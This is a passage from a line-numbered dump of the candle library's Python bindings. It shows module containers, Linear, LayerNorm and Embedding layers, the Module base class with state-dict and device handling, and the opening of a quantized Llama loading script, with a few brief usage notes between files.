+ return self.__class__(OrderedDict(list(self._modules.items())[idx]))
539
+ else:
540
+ return self._get_item_by_idx(self._modules.values(), idx)
541
+
542
+ def __setitem__(self, idx: int, module: Module) -> None:
543
+ key: str = self._get_item_by_idx(self._modules.keys(), idx)
544
+ return setattr(self, key, module)
545
+
546
+ def __delitem__(self, idx: Union[slice, int]) -> None:
547
+ if isinstance(idx, slice):
548
+ for key in list(self._modules.keys())[idx]:
549
+ delattr(self, key)
550
+ else:
551
+ key = self._get_item_by_idx(self._modules.keys(), idx)
552
+ delattr(self, key)
553
+ str_indices = [str(i) for i in range(len(self._modules))]
554
+ self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))
555
+
556
+ def __len__(self) -> int:
557
+ return len(self._modules)
558
+
559
+ def __add__(self, other) -> 'Sequential':
560
+ if isinstance(other, Sequential):
561
+ ret = Sequential()
562
+ for layer in self:
563
+ ret.append(layer)
564
+ for layer in other:
565
+ ret.append(layer)
566
+ return ret
567
+ else:
568
+ raise ValueError('add operator supports only objects of Sequential class, but {} is given.'.format(str(type(other))))
569
+
570
+ def pop(self, key: Union[int, slice]) -> Module:
571
+ v = self[key]
572
+ del self[key]
573
+ return v
574
+
575
+ def __iadd__(self, other) -> 'Sequential':
576
+ if isinstance(other, Sequential):
577
+ offset = len(self)
578
+ for (i, module) in enumerate(other):
579
+ self.add_module(str(i + offset), module)
580
+ return self
581
+ else:
582
+ raise ValueError('add operator supports only objects of Sequential class, but {} is given.'.format(str(type(other))))
583
+
584
+ def __mul__(self, other: int) -> 'Sequential':
585
+ if not isinstance(other, int):
586
+ raise TypeError(f'unsupported operand type(s) for *: {type(self)} and {type(other)}')
587
+ elif other <= 0:
588
+ raise ValueError(f'Non-positive multiplication factor {other} for {type(self)}')
589
+ else:
590
+ combined = Sequential()
591
+ offset = 0
592
+ for _ in range(other):
593
+ for module in self:
594
+ combined.add_module(str(offset), module)
595
+ offset += 1
596
+ return combined
597
+
598
+ def __rmul__(self, other: int) -> 'Sequential':
599
+ return self.__mul__(other)
600
+
601
+ def __imul__(self, other: int) -> 'Sequential':
602
+ if not isinstance(other, int):
603
+ raise TypeError(f'unsupported operand type(s) for *: {type(self)} and {type(other)}')
604
+ elif other <= 0:
605
+ raise ValueError(f'Non-positive multiplication factor {other} for {type(self)}')
606
+ else:
607
+ len_original = len(self)
608
+ offset = len(self)
609
+ for _ in range(other - 1):
610
+ for i in range(len_original):
611
+ self.add_module(str(i + offset), self._modules[str(i)])
612
+ offset += len_original
613
+ return self
614
+
615
+ def __dir__(self):
616
+ keys = super().__dir__()
617
+ keys = [key for key in keys if not key.isdigit()]
618
+ return keys
619
+
620
+ def __iter__(self) -> Iterator[Module]:
621
+ return iter(self._modules.values())
622
+
623
+ def forward(self, input):
624
+ for module in self:
625
+ input = module(input)
626
+ return input
627
+
628
+ def append(self, module: Module) -> 'Sequential':
629
+ self.add_module(str(len(self)), module)
630
+ return self
631
+
632
+ def insert(self, index: int, module: Module) -> 'Sequential':
633
+ if not isinstance(module, Module):
634
+ raise AssertionError('module should be of type: {}'.format(Module))
635
+ n = len(self._modules)
636
+ if not -n <= index <= n:
637
+ raise IndexError('Index out of range: {}'.format(index))
638
+ if index < 0:
639
+ index += n
640
+ for i in range(n, index, -1):
641
+ self._modules[str(i)] = self._modules[str(i - 1)]
642
+ self._modules[str(index)] = module
643
+ return self
644
+
645
+ def extend(self, sequential) -> 'Sequential':
646
+ for layer in sequential:
647
+ self.append(layer)
648
+ return self
649
+
650
+ class ModuleList(Module):
651
+ _modules: Dict[str, Module]
652
+
653
+ def __init__(self, modules: Optional[Iterable[Module]]=None) -> None:
654
+ super().__init__()
655
+ if modules is not None:
656
+ self += modules
657
+
658
+ def _get_abs_string_index(self, idx):
659
+ idx = operator.index(idx)
660
+ if not -len(self) <= idx < len(self):
661
+ raise IndexError('index {} is out of range'.format(idx))
662
+ if idx < 0:
663
+ idx += len(self)
664
+ return str(idx)
665
+
666
+ def __getitem__(self, idx: Union[int, slice]) -> Union[Module, 'ModuleList']:
667
+ if isinstance(idx, slice):
668
+ return self.__class__(list(self._modules.values())[idx])
669
+ else:
670
+ return self._modules[self._get_abs_string_index(idx)]
671
+
672
+ def __setitem__(self, idx: int, module: Module) -> None:
673
+ idx = self._get_abs_string_index(idx)
674
+ return setattr(self, str(idx), module)
675
+
676
+ def __delitem__(self, idx: Union[int, slice]) -> None:
677
+ if isinstance(idx, slice):
678
+ for k in range(len(self._modules))[idx]:
679
+ delattr(self, str(k))
680
+ else:
681
+ delattr(self, self._get_abs_string_index(idx))
682
+ str_indices = [str(i) for i in range(len(self._modules))]
683
+ self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))
684
+
685
+ def __len__(self) -> int:
686
+ return len(self._modules)
687
+
688
+ def __iter__(self) -> Iterator[Module]:
689
+ return iter(self._modules.values())
690
+
691
+ def __iadd__(self, modules: Iterable[Module]) -> 'ModuleList':
692
+ return self.extend(modules)
693
+
694
+ def __add__(self, other: Iterable[Module]) -> 'ModuleList':
695
+ combined = ModuleList()
696
+ for (i, module) in enumerate(chain(self, other)):
697
+ combined.add_module(str(i), module)
698
+ return combined
699
+
700
+ def __repr__(self):
701
+ list_of_reprs = [repr(item) for item in self]
702
+ if len(list_of_reprs) == 0:
703
+ return self._get_name() + '()'
704
+ start_end_indices = [[0, 0]]
705
+ repeated_blocks = [list_of_reprs[0]]
706
+ for (i, r) in enumerate(list_of_reprs[1:], 1):
707
+ if r == repeated_blocks[-1]:
708
+ start_end_indices[-1][1] += 1
709
+ continue
710
+ start_end_indices.append([i, i])
711
+ repeated_blocks.append(r)
712
+ lines = []
713
+ main_str = self._get_name() + '('
714
+ for ((start_id, end_id), b) in zip(start_end_indices, repeated_blocks):
715
+ local_repr = f'({start_id}): {b}'
716
+ if start_id != end_id:
717
+ n = end_id - start_id + 1
718
+ local_repr = f'({start_id}-{end_id}): {n} x {b}'
719
+ local_repr = _addindent(local_repr, 2)
720
+ lines.append(local_repr)
721
+ main_str += '\n ' + '\n '.join(lines) + '\n'
722
+ main_str += ')'
723
+ return main_str
724
+
725
+ def __dir__(self):
726
+ keys = super().__dir__()
727
+ keys = [key for key in keys if not key.isdigit()]
728
+ return keys
729
+
730
+ def insert(self, index: int, module: Module) -> None:
731
+ for i in range(len(self._modules), index, -1):
732
+ self._modules[str(i)] = self._modules[str(i - 1)]
733
+ self._modules[str(index)] = module
734
+
735
+ def append(self, module: Module) -> 'ModuleList':
736
+ self.add_module(str(len(self)), module)
737
+ return self
738
+
739
+ def pop(self, key: Union[int, slice]) -> Module:
740
+ v = self[key]
741
+ del self[key]
742
+ return v
743
+
744
+ def extend(self, modules: Iterable[Module]) -> 'ModuleList':
745
+ if not isinstance(modules, container_abcs.Iterable):
746
+ raise TypeError('ModuleList.extend should be called with an iterable, but got ' + type(modules).__name__)
747
+ offset = len(self)
748
+ for (i, module) in enumerate(modules):
749
+ self.add_module(str(offset + i), module)
750
+ return self
751
+
752
+ class ModuleDict(Module):
753
+ _modules: Dict[str, Module]
754
+
755
+ def __init__(self, modules: Optional[Mapping[str, Module]]=None) -> None:
756
+ super().__init__()
757
+ if modules is not None:
758
+ self.update(modules)
759
+
760
+ def __getitem__(self, key: str) -> Module:
761
+ return self._modules[key]
762
+
763
+ def __setitem__(self, key: str, module: Module) -> None:
764
+ self.add_module(key, module)
765
+
766
+ def __delitem__(self, key: str) -> None:
767
+ del self._modules[key]
768
+
769
+ def __len__(self) -> int:
770
+ return len(self._modules)
771
+
772
+ def __iter__(self) -> Iterator[str]:
773
+ return iter(self._modules)
774
+
775
+ def __contains__(self, key: str) -> bool:
776
+ return key in self._modules
777
+
778
+ def clear(self) -> None:
779
+ self._modules.clear()
780
+
781
+ def pop(self, key: str) -> Module:
782
+ v = self[key]
783
+ del self[key]
784
+ return v
785
+
786
+ def keys(self) -> Iterable[str]:
787
+ return self._modules.keys()
788
+
789
+ def items(self) -> Iterable[Tuple[str, Module]]:
790
+ return self._modules.items()
791
+
792
+ def values(self) -> Iterable[Module]:
793
+ return self._modules.values()
794
+
795
+ def update(self, modules: Mapping[str, Module]) -> None:
796
+ if not isinstance(modules, container_abcs.Iterable):
797
+ raise TypeError('ModuleDict.update should be called with an iterable of key/value pairs, but got ' + type(modules).__name__)
798
+ if isinstance(modules, (OrderedDict, ModuleDict, container_abcs.Mapping)):
799
+ for (key, module) in modules.items():
800
+ self[key] = module
801
+ else:
802
+ for (j, m) in enumerate(modules):
803
+ if not isinstance(m, container_abcs.Iterable):
804
+ raise TypeError('ModuleDict update sequence element #' + str(j) + ' should be Iterable; is ' + type(m).__name__)
805
+ if not len(m) == 2:
806
+ raise ValueError('ModuleDict update sequence element #' + str(j) + ' has length ' + str(len(m)) + '; 2 is required')
807
+ self[m[0]] = m[1]
808
+
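A small sketch of how Sequential composes candle modules, assuming the Linear layer defined in the next file: children are stored under string keys ('0', '1', ...) and forward simply chains their calls in insertion order.

import candle
from candle.nn import Sequential, Linear   # assumes both are re-exported by candle.nn

model = Sequential(Linear(16, 32), Linear(32, 8))
x = candle.randn((4, 16))
y = model(x)                      # each child's forward runs in insertion order
print(len(model), y.shape)        # 2 (4, 8)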
809
+ # File: candle-main/candle-pyo3/py_src/candle/nn/linear.py
810
+ import math
811
+ from typing import Any
812
+ import candle
813
+ from candle import Tensor
814
+ from .module import Module
815
+
816
+ class Identity(Module):
817
+
818
+ def __init__(self, *args: Any, **kwargs: Any) -> None:
819
+ super().__init__()
820
+
821
+ def forward(self, input: Tensor) -> Tensor:
822
+ return input
823
+
824
+ class Linear(Module):
825
+ __constants__ = ['in_features', 'out_features']
826
+ in_features: int
827
+ out_features: int
828
+ weight: Tensor
829
+
830
+ def __init__(self, in_features: int, out_features: int, bias: bool=True, device=None, dtype=None) -> None:
831
+ factory_kwargs = {'device': device, 'dtype': dtype}
832
+ super().__init__()
833
+ self._quantizable_buffers.add('weight')
834
+ self.in_features = in_features
835
+ self.out_features = out_features
836
+ self.weight = candle.ones((out_features, in_features), **factory_kwargs)
837
+ if bias:
838
+ self.bias = candle.zeros((out_features,), **factory_kwargs)
839
+ else:
840
+ self.bias = None
841
+
842
+ def forward(self, x: Tensor) -> Tensor:
843
+ dims = x.shape
844
+ last_dim = dims[-1]
845
+ if isinstance(self.weight, candle.QTensor):
846
+ if len(dims) < 3:
847
+ matmul_result = self.weight.matmul_t(x).broadcast_add(self.bias)
848
+ elif len(dims) == 3:
849
+ (b, n, m) = dims
850
+ output_shape = (b, n, self.out_features)
851
+ re = x.reshape((b * n, m))
852
+ matmul_result = self.weight.matmul_t(re).reshape(output_shape)
853
+ else:
854
+ raise NotImplementedError("'QTensor.matmul_t' is not implemented for more than 3 dimensions")
855
+ if self.bias:
856
+ return matmul_result.broadcast_add(self.bias)
857
+ else:
858
+ if self.weight.shape[-1] == last_dim and len(dims) < 3:
859
+ w = self.weight.t()
860
+ else:
861
+ batch_size = dims[0]
862
+ w = self.weight.broadcast_left((batch_size,)).t()
863
+ x = x.matmul(w)
864
+ if self.bias is not None:
865
+ x = x.broadcast_add(self.bias)
866
+ return x
867
+
868
+ def extra_repr(self) -> str:
869
+ return f'in_features={self.in_features}, out_features={self.out_features}, bias={self.bias is not None}'
870
+
871
+ # File: candle-main/candle-pyo3/py_src/candle/nn/module.py
872
+ from candle import Tensor, QTensor, DType
873
+ from typing import Dict, Tuple, Any, Optional, Union, Iterator, Set, overload, Mapping, TypeVar, List
874
+ from collections import OrderedDict, namedtuple
875
+ TensorLike = Union[Tensor, QTensor]
876
+ T = TypeVar('T', bound='Module')
877
+
878
+ class _IncompatibleKeys(namedtuple('IncompatibleKeys', ['missing_keys', 'unexpected_keys'])):
879
+
880
+ def __repr__(self):
881
+ if not self.missing_keys and (not self.unexpected_keys):
882
+ return '<All keys matched successfully>'
883
+ return super().__repr__()
884
+ __str__ = __repr__
885
+
886
+ class Module:
887
+ _modules: Dict[str, Optional['Module']]
888
+ _buffers: Dict[str, Optional[TensorLike]]
889
+ _non_persistent_buffers_set: Set[str]
890
+ _quantizable_buffers: Set[str]
891
+ _version: int = 1
892
+
893
+ def __init__(self, *args, **kwargs) -> None:
894
+ super().__setattr__('_modules', OrderedDict())
895
+ super().__setattr__('_buffers', OrderedDict())
896
+ super().__setattr__('_non_persistent_buffers_set', set())
897
+ super().__setattr__('_quantizable_buffers', set())
898
+
899
+ def __call__(self, *input):
900
+ return self.forward(*input)
901
+
902
+ def forward(self, *input):
903
+ pass
904
+
905
+ def children(self) -> Iterator['Module']:
906
+ for (name, module) in self.named_children():
907
+ yield module
908
+
909
+ def named_children(self) -> Iterator[Tuple[str, 'Module']]:
910
+ memo = set()
911
+ for (name, module) in self._modules.items():
912
+ if module is not None and module not in memo:
913
+ memo.add(module)
914
+ yield (name, module)
915
+
916
+ def add_module(self, name: str, module: Optional['Module']) -> None:
917
+ if not isinstance(module, Module) and module is not None:
918
+ raise TypeError(f'{str(module)} is not a Module subclass')
919
+ elif not isinstance(name, str):
920
+ raise TypeError(f'module name should be a string. Got {name}')
921
+ elif hasattr(self, name) and name not in self._modules:
922
+ raise KeyError(f"attribute '{name}' already exists")
923
+ elif '.' in name:
924
+ raise KeyError(f"""module name can't contain ".", got: {name}""")
925
+ elif name == '':
926
+ raise KeyError('module name can\'t be empty string ""')
927
+ self._modules[name] = module
928
+
929
+ def register_module(self, name: str, module: Optional['Module']) -> None:
930
+ self.add_module(name, module)
931
+
932
+ def modules(self) -> Iterator['Module']:
933
+ for (_, module) in self.named_modules():
934
+ yield module
935
+
936
+ def named_modules(self, memo: Optional[Set['Module']]=None, prefix: str='', remove_duplicate: bool=True):
937
+ if memo is None:
938
+ memo = set()
939
+ if self not in memo:
940
+ if remove_duplicate:
941
+ memo.add(self)
942
+ yield (prefix, self)
943
+ for (name, module) in self._modules.items():
944
+ if module is None:
945
+ continue
946
+ submodule_prefix = prefix + ('.' if prefix else '') + name
947
+ for m in module.named_modules(memo, submodule_prefix, remove_duplicate):
948
+ yield m
949
+
950
+ def buffers(self, recurse: bool=True) -> Iterator[TensorLike]:
951
+ for (name, buf) in self.named_buffers(recurse=recurse):
952
+ yield buf
953
+
954
+ def named_buffers(self, prefix: str='', recurse: bool=True, remove_duplicate: bool=True) -> Iterator[Tuple[str, TensorLike]]:
955
+ gen = self._named_members(lambda module: module._buffers.items(), prefix=prefix, recurse=recurse, remove_duplicate=remove_duplicate)
956
+ yield from gen
957
+ T_destination = TypeVar('T_destination', bound=Dict[str, Any])
958
+
959
+ @overload
960
+ def state_dict(self, *, destination: T_destination, prefix: str=..., keep_vars: bool=...) -> T_destination:
961
+ ...
962
+
963
+ @overload
964
+ def state_dict(self, *, prefix: str=..., keep_vars: bool=...) -> Dict[str, Any]:
965
+ ...
966
+
967
+ def state_dict(self, *args, destination=None, prefix='', keep_vars=False):
968
+ if len(args) > 0:
969
+ if destination is None:
970
+ destination = args[0]
971
+ if len(args) > 1 and prefix == '':
972
+ prefix = args[1]
973
+ if len(args) > 2 and keep_vars is False:
974
+ keep_vars = args[2]
975
+ if destination is None:
976
+ destination = OrderedDict()
977
+ destination._metadata = OrderedDict()
978
+ local_metadata = dict(version=self._version)
979
+ if hasattr(destination, '_metadata'):
980
+ destination._metadata[prefix[:-1]] = local_metadata
981
+ self._save_to_state_dict(destination, prefix, keep_vars)
982
+ for (name, module) in self._modules.items():
983
+ if module is not None:
984
+ module.state_dict(destination=destination, prefix=prefix + name + '.', keep_vars=keep_vars)
985
+ return destination
986
+
987
+ def _save_to_state_dict(self, destination, prefix, keep_vars):
988
+ for (name, buf) in self._buffers.items():
989
+ if buf is not None and name not in self._non_persistent_buffers_set:
990
+ if isinstance(buf, Tensor):
991
+ destination[prefix + name] = buf if keep_vars else buf.detach()
992
+ else:
993
+ destination[prefix + name] = buf
994
+
995
+ def load_state_dict(self, state_dict: Mapping[str, Any], strict: bool=True, assign: bool=False):
996
+ if not isinstance(state_dict, Mapping):
997
+ raise TypeError(f'Expected state_dict to be dict-like, got {type(state_dict)}.')
998
+ missing_keys: List[str] = []
999
+ unexpected_keys: List[str] = []
1000
+ error_msgs: List[str] = []
1001
+ metadata = getattr(state_dict, '_metadata', None)
1002
+ state_dict = OrderedDict(state_dict)
1003
+ if metadata is not None:
1004
+ state_dict._metadata = metadata
1005
+
1006
+ def load(module, local_state_dict, prefix=''):
1007
+ local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
1008
+ if assign:
1009
+ local_metadata['assign_to_params_buffers'] = assign
1010
+ module._load_from_state_dict(local_state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
1011
+ for (name, child) in module._modules.items():
1012
+ if child is not None:
1013
+ child_prefix = prefix + name + '.'
1014
+ child_state_dict = {k: v for (k, v) in local_state_dict.items() if k.startswith(child_prefix)}
1015
+ load(child, child_state_dict, child_prefix)
1016
+ load(self, state_dict)
1017
+ del load
1018
+ if strict:
1019
+ if len(unexpected_keys) > 0:
1020
+ error_msgs.insert(0, 'Unexpected key(s) in state_dict: {}. '.format(', '.join((f'"{k}"' for k in unexpected_keys))))
1021
+ if len(missing_keys) > 0:
1022
+ error_msgs.insert(0, 'Missing key(s) in state_dict: {}. '.format(', '.join((f'"{k}"' for k in missing_keys))))
1023
+ if len(error_msgs) > 0:
1024
+ raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(self.__class__.__name__, '\n\t'.join(error_msgs)))
1025
+ return _IncompatibleKeys(missing_keys, unexpected_keys)
1026
+
1027
+ def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
1028
+ persistent_buffers = {k: v for (k, v) in self._buffers.items() if k not in self._non_persistent_buffers_set}
1029
+ local_name_params = persistent_buffers.items()
1030
+ local_state = {k: v for (k, v) in local_name_params if v is not None}
1031
+ for (name, param) in local_state.items():
1032
+ key = prefix + name
1033
+ if key in state_dict:
1034
+ input_param = state_dict[key]
1035
+ if not isinstance(input_param, (Tensor, QTensor)):
1036
+ error_msgs.append(f'While copying the parameter named "{key}", expected Tensor-like object from checkpoint but received {type(input_param)}')
1037
+ continue
1038
+ if input_param.shape != param.shape:
1039
+ error_msgs.append('size mismatch for {}: copying a param with shape {} from checkpoint, the shape in current model is {}.'.format(key, input_param.shape, param.shape))
1040
+ continue
1041
+ try:
1042
+ setattr(self, name, input_param)
1043
+ except Exception as ex:
1044
+ error_msgs.append(f'While copying the parameter named "{key}", whose dimensions in the model are {param.shape} and whose dimensions in the checkpoint are {input_param.shape}, an exception occurred : {ex.args}.')
1045
+ elif strict:
1046
+ missing_keys.append(key)
1047
+ if strict:
1048
+ for key in state_dict.keys():
1049
+ if key.startswith(prefix):
1050
+ input_name = key[len(prefix):]
1051
+ input_name = input_name.split('.', 1)[0]
1052
+ if input_name not in self._modules and input_name not in local_state:
1053
+ unexpected_keys.append(key)
1054
+
1055
+ def _named_members(self, get_members_fn, prefix='', recurse=True, remove_duplicate: bool=True):
1056
+ memo = set()
1057
+ modules = self.named_modules(prefix=prefix, remove_duplicate=remove_duplicate) if recurse else [(prefix, self)]
1058
+ for (module_prefix, module) in modules:
1059
+ members = get_members_fn(module)
1060
+ for (k, v) in members:
1061
+ if v is None or v in memo:
1062
+ continue
1063
+ if remove_duplicate:
1064
+ memo.add(v)
1065
+ name = module_prefix + ('.' if module_prefix else '') + k
1066
+ yield (name, v)
1067
+
1068
+ def _get_name(self):
1069
+ return self.__class__.__name__
1070
+
1071
+ def _apply(self, fn):
1072
+ for module in self.children():
1073
+ module._apply(fn)
1074
+ for (key, buf) in self._buffers.items():
1075
+ if buf is not None:
1076
+ self._buffers[key] = fn(buf)
1077
+ return self
1078
+
1079
+ def __move_tensor_to_device(self, tensor: TensorLike, device: str):
1080
+ if isinstance(tensor, Tensor):
1081
+ return tensor.to_device(device)
1082
+ else:
1083
+ raise NotImplementedError('Cannot offload QTensor to cuda, yet!')
1084
+
1085
+ def device(self) -> str:
1086
+ tensor = next(self.buffers())
1087
+ if isinstance(tensor, Tensor):
1088
+ return tensor.device
1089
+ else:
1090
+ return 'cpu'
1091
+
1092
+ def cuda(self: T) -> T:
1093
+
1094
+ def to_cuda(t: TensorLike):
1095
+ return self.__move_tensor_to_device(t, 'cuda')
1096
+ return self._apply(to_cuda)
1097
+
1098
+ def cpu(self: T) -> T:
1099
+
1100
+ def to_cpu(t: TensorLike):
1101
+ return self.__move_tensor_to_device(t, 'cpu')
1102
+ return self._apply(to_cpu)
1103
+
1104
+ def __cast_tensor(self, tensor: TensorLike, dtype: Union[DType, str]):
1105
+ if isinstance(tensor, Tensor):
1106
+ return tensor.to_dtype(dtype)
1107
+ else:
1108
+ raise TypeError('candle.Module.to only accepts Tensor dtypes, but got desired dtype={}'.format(dtype))
1109
+
1110
+ def type(self: T, dst_type: Union[DType, str]) -> T:
1111
+
1112
+ def cast(t: TensorLike):
1113
+ return self.__cast_tensor(t, dst_type)
1114
+ return self._apply(cast)
1115
+
1116
+ @overload
1117
+ def to(self: T, device: str=..., dtype: Optional[Union[DType, str]]=...) -> T:
1118
+ ...
1119
+
1120
+ @overload
1121
+ def to(self: T, dtype: Union[DType, str]) -> T:
1122
+ ...
1123
+
1124
+ def to(self, *args, **kwargs):
1125
+ device = None
1126
+ dtype = None
1127
+ if args:
1128
+ for arg in args:
1129
+ if isinstance(arg, str):
1130
+ lower_arg = str(arg).lower()
1131
+ if lower_arg.startswith('cuda') or lower_arg == 'cpu':
1132
+ device = lower_arg
1133
+ else:
1134
+ dtype = arg
1135
+ elif isinstance(arg, DType):
1136
+ dtype = str(arg)
1137
+ else:
1138
+ raise TypeError('Module.to() received an invalid combination of arguments. Got: {}'.format(args))
1139
+ if kwargs:
1140
+ device = kwargs.get('device', device)
1141
+ dtype = str(kwargs.get('dtype', dtype))
1142
+ if device:
1143
+ device = device.lower()
1144
+ if dtype:
1145
+ dtype = dtype.lower()
1146
+ if dtype not in ['f32', 'f16', 'f64']:
1147
+ raise TypeError('candle.Module.to only accepts floating point dtypes, but got desired dtype={}'.format(dtype))
1148
+
1149
+ def convert(t):
1150
+ if dtype:
1151
+ t = self.__cast_tensor(t, dtype)
1152
+ if device:
1153
+ t = self.__move_tensor_to_device(t, device)
1154
+ return t
1155
+ return self._apply(convert)
1156
+
1157
+ def __setattr__(self, __name: str, __value: Any) -> None:
1158
+ if isinstance(__value, Module):
1159
+ self._modules[__name] = __value
1160
+ elif isinstance(__value, QTensor):
1161
+ if __name in self._quantizable_buffers:
1162
+ type = __value.ggml_dtype.lower()
1163
+ if type in ['f32', 'f16']:
1164
+ dequant = __value.dequantize()
1165
+ if type == 'f16':
1166
+ dequant = dequant.to_dtype('f16')
1167
+ self._buffers[__name] = dequant
1168
+ else:
1169
+ self._buffers[__name] = __value
1170
+ else:
1171
+ self._buffers[__name] = __value.dequantize()
1172
+ elif isinstance(__value, Tensor):
1173
+ self._buffers[__name] = __value
1174
+ else:
1175
+ super().__setattr__(__name, __value)
1176
+
1177
+ def __getattr__(self, __name: str) -> Any:
1178
+ if '_modules' in self.__dict__:
1179
+ modules = self.__dict__['_modules']
1180
+ if __name in modules:
1181
+ return modules[__name]
1182
+ if '_buffers' in self.__dict__:
1183
+ tensors = self.__dict__['_buffers']
1184
+ if __name in tensors:
1185
+ return tensors[__name]
1186
+ return super().__getattribute__(__name)
1187
+
1188
+ def __delattr__(self, name):
1189
+ if name in self._buffers:
1190
+ del self._buffers[name]
1191
+ elif name in self._modules:
1192
+ del self._modules[name]
1193
+ else:
1194
+ super().__delattr__(name)
1195
+
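A rough sketch of the Module plumbing defined above, reusing the Linear layer from the earlier file: tensors assigned in __setattr__ land in _buffers, state_dict() flattens them under dotted names, and to()/cpu()/cuda() rewrite every buffer through _apply.

layer = Linear(4, 2)
sd = layer.state_dict()           # {'weight': Tensor of shape (2, 4), 'bias': Tensor of shape (2,)}
layer.load_state_dict(sd)         # -> <All keys matched successfully>
layer.to('f16')                   # casts every buffer to f16 in place and returns the same module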
1196
+ # File: candle-main/candle-pyo3/py_src/candle/nn/normalization.py
1197
+ import candle
1198
+ from candle import Tensor
1199
+ from .module import Module
1200
+ from typing import Union, List, Tuple, Optional, Any
1201
+ _shape_t = Union[int, List[int]]
1202
+ import numbers
1203
+
1204
+ class LayerNorm(Module):
1205
+ __constants__ = ['normalized_shape', 'eps']
1206
+ normalized_shape: Tuple[int, ...]
1207
+ eps: float
1208
+
1209
+ def __init__(self, normalized_shape: _shape_t, eps: float=1e-05, bias: bool=True, device=None, dtype=None) -> None:
1210
+ factory_kwargs = {'device': device, 'dtype': dtype}
1211
+ super().__init__()
1212
+ if isinstance(normalized_shape, numbers.Integral):
1213
+ normalized_shape = (normalized_shape,)
1214
+ self.normalized_shape = tuple(normalized_shape)
1215
+ self.eps = eps
1216
+ self.weight = candle.ones(normalized_shape, **factory_kwargs)
1217
+ if bias:
1218
+ self.bias = candle.zeros(normalized_shape, **factory_kwargs)
1219
+ else:
1220
+ self.bias = None
1221
+
1222
+ def forward(self, input: Tensor) -> Tensor:
1223
+ mean_x = input.sum_keepdim(2) / float(self.normalized_shape[-1])
1224
+ x = input.broadcast_sub(mean_x)
1225
+ norm_x = x.sqr().sum_keepdim(2) / float(self.normalized_shape[-1])
1226
+ x_normed = x.broadcast_div((norm_x + self.eps).sqrt())
1227
+ x = x_normed.broadcast_mul(self.weight)
1228
+ if self.bias:
1229
+ x = x.broadcast_add(self.bias)
1230
+ return x
1231
+
1232
+ def extra_repr(self) -> str:
1233
+ return '{normalized_shape}, eps={eps}, elementwise_affine={elementwise_affine}'.format(**self.__dict__)
1234
+
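Note that, unlike a fully general layer norm, the forward above hard-codes its reductions over dimension 2 (sum_keepdim(2)), so it expects rank-3 activations of shape (batch, seq_len, hidden_size); for such inputs it computes (x - mean) / sqrt(var + eps), scaled by weight and, when a bias is present, shifted by bias.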
1235
+ # File: candle-main/candle-pyo3/py_src/candle/nn/sparse.py
1236
+ from .module import Module
1237
+ from typing import Optional, Tuple, Any
1238
+ from candle import Tensor
1239
+ import candle
1240
+
1241
+ class Embedding(Module):
1242
+
1243
+ def __init__(self, num_embeddings: int, embedding_dim: int, device=None) -> None:
1244
+ factory_kwargs = {'device': device}
1245
+ super().__init__()
1246
+ self.num_embeddings = num_embeddings
1247
+ self.embedding_dim = embedding_dim
1248
+ self.weight = candle.randn((num_embeddings, embedding_dim), **factory_kwargs)
1249
+
1250
+ def forward(self, indexes: Tensor) -> Tensor:
1251
+ final_dims = list(indexes.shape)
1252
+ final_dims.append(self.embedding_dim)
1253
+ indexes = indexes.flatten_all()
1254
+ values = self.weight.index_select(indexes, 0)
1255
+ return values.reshape(final_dims)
1256
+
1257
+ # File: candle-main/candle-pyo3/py_src/candle/typing/__init__.py
1258
+ from typing import TypeVar, Union, Sequence
1259
+ _T = TypeVar('_T')
1260
+ _ArrayLike = Union[_T, Sequence[_T], Sequence[Sequence[_T]], Sequence[Sequence[Sequence[_T]]], Sequence[Sequence[Sequence[Sequence[_T]]]]]
1261
+ CPU: str = 'cpu'
1262
+ CUDA: str = 'cuda'
1263
+ Device = TypeVar('Device', CPU, CUDA)
1264
+ Scalar = Union[int, float]
1265
+ Index = Union[int, slice, None, 'Ellipsis']
1266
+ Shape = Union[int, Sequence[int]]
1267
+
1268
+ # File: candle-main/candle-pyo3/quant-llama.py
1269
+ import sys
1270
+ from typing import Dict, Tuple, Any
1271
+ import candle
1272
+ from candle.models.llama import QuantizedLlama
1273
+ from candle import utils
1274
+ MAX_SEQ_LEN = 4096
1275
+
1276
+ def gguf_rename(tensor_name: str):
1277
+ if tensor_name == 'token_embd.weight':
1278
+ return 'tok_embeddings.weight'
1279
+ if tensor_name == 'output_norm.weight':
1280
+ return 'norm.weight'
1281
+ tensor_name = tensor_name.replace('blk.', 'layers.')
1282
+ tensor_name = tensor_name.replace('.attn_q.', '.attention.wq.')
1283
+ tensor_name = tensor_name.replace('.attn_k.', '.attention.wk.')
1284
+ tensor_name = tensor_name.replace('.attn_v.', '.attention.wv.')
1285
+ tensor_name = tensor_name.replace('.attn_output.', '.attention.wo.')
1286
+ tensor_name = tensor_name.replace('.ffn_gate.', '.feed_forward.w1.')
1287
+ tensor_name = tensor_name.replace('.ffn_down.', '.feed_forward.w2.')
1288
+ tensor_name = tensor_name.replace('.ffn_up.', '.feed_forward.w3.')
1289
+ tensor_name = tensor_name.replace('.attn_norm.', '.attention_norm.')
1290
+ return tensor_name
1291
+
1292
+ def main():
1293
+ if len(sys.argv) < 2:
1294
+ raise ValueError('missing weight file argument')
1295
+ filename = sys.argv[1]
1296
+ print(f'reading model file {filename}')
1297
+ if filename.endswith('gguf'):
1298
+ (all_tensors, metadata) = utils.load_gguf(filename)
1299
+ vocab = metadata['tokenizer.ggml.tokens']
1300
+ for (i, v) in enumerate(vocab):
1301
+ vocab[i] = '\n' if v == '<0x0A>' else v.replace('▁', ' ')
1302
+ hparams = {k: v for (k, v) in metadata.items() if not k.startswith('tokenizer')}
1303
+ print(hparams)
1304
+ hparams = {'n_vocab': len(vocab), 'n_embd': metadata['llama.embedding_length'], 'n_mult': 256, 'n_head': metadata['llama.attention.head_count'], 'n_head_kv': metadata['llama.attention.head_count_kv'], 'n_layer': metadata['llama.block_count'], 'n_rot': metadata['llama.rope.dimension_count'], 'rope_freq': metadata.get('llama.rope.freq_base', 10000.0), 'ftype': metadata['general.file_type'], 'context_length': metadata['llama.context_length']}
1305
+ all_tensors = {gguf_rename(k): v for (k, v) in all_tensors.items()}
1306
+ else:
1307
+ (all_tensors, hparams, vocab) = utils.load_ggml(filename)
1308
+ hparams['context_length'] = 2048
1309
+ print(hparams)
1310
+ model = QuantizedLlama(hparams, all_tensors)
1311
